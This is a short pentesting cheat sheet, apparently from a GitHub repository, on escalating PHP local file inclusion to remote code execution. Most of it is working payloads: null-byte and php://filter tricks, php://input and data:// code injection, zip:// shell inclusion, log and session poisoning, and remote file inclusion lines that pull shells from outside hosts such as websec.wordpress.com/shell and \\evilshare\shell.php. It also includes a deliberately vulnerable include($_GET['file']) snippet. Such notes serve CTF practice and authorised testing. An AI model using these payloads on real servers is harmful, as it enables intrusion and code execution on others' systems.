-
Notifications
You must be signed in to change notification settings - Fork 4
/
lfi.txt
106 lines (73 loc) · 2.86 KB
/
lfi.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
LFI to RCE
- intersting files: https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-InterestingFiles.txt
- there is a file in the same repo with %00 attached (and try /etc/%00 for dir listing)
reference:
https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
https://rawsec.ml/en/local-file-inclusion-remote-code-execution-vulnerability/
https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion
don't forget to try the null byte: include(BASE . 'user_input%00' . '.php')
Using file upload forms/functions
- echo '<?php phpinfo(); ?>' >> cat.jpg
- include "/var/www/html/cat.jpg";
- maybe in the filename?
- maybe in the $_FILES['myFile']['tmp_name']?
Using the PHP wrapper expect://command
- need to be installed
- example http://insecurety.net/?p=724 (expect://ls)
- http://php.net/manual/en/wrappers.expect.php
Using the PHP wrapper php://file
- include("file:///etc/passwd");
Using the PHP wrapper php://filter
- use it if .php is appended and %00 is not working
- include("php://filter/convert.base64-encode/resource=index" . ".php");
Using PHP input:// stream
- include("php://input");
- curl localhost/lfi3.php -d "a=<?php phpinfo(); ?>"
- that worked pretty well for me
Using PHP zip:// stream
- http://www.site.com/lfi.php?page=zip://image.zip#shell.php
- didn't test it...
1. upload file.zip which contains shell.php
2. zip://path/to/file.zip%23shell will include shell (in this case it expects ".php" to be appended)
- If the file upload function does not allow zip files to be uploaded, attempts can be made to bypass
Using data://text/plain;base64,command
- include("data://text/plain,<?php phpinfo() ?>");
- $content = '<?php phpinfo() ;?>';
- include("data://text/plain;base64,".base64_encode($content));
Using /proc/self/environ
- contains user agent
- didn't work for me
Using /proc/self/fd
- user /proc/self/fd/2 or different fd
- didn't work for me
Using log files with controllable input like:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
Using php session storage
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
- include /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
Using remote file inclusion
- if .php is appended
- include("http://ip/file" . ".php")
Using Truncation:
- did not work for me
https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion
Using E-Mail
https://www.exploit-db.com/docs/40992.pdf
Using XSS:
- ?file=http://127.0.0.1/path/xss.php?xss=phpcode
- trace http method?
to test:
<?php include($_GET['file'] . ".htm"); ?>
Code:
?file=https://websec.wordpress.com/shell
?file=https://websec.wordpress.com/shell.txt?
?file=https://websec.wordpress.com/shell.txt%23
(requires allow_url_fopen=On and allow_url_include=On)
?file=\\evilshare\shell.php
(bypasses allow_url_fopen=Off)
[code]
https://raidforums.com/Thread-Local-File-Inclusion-LFI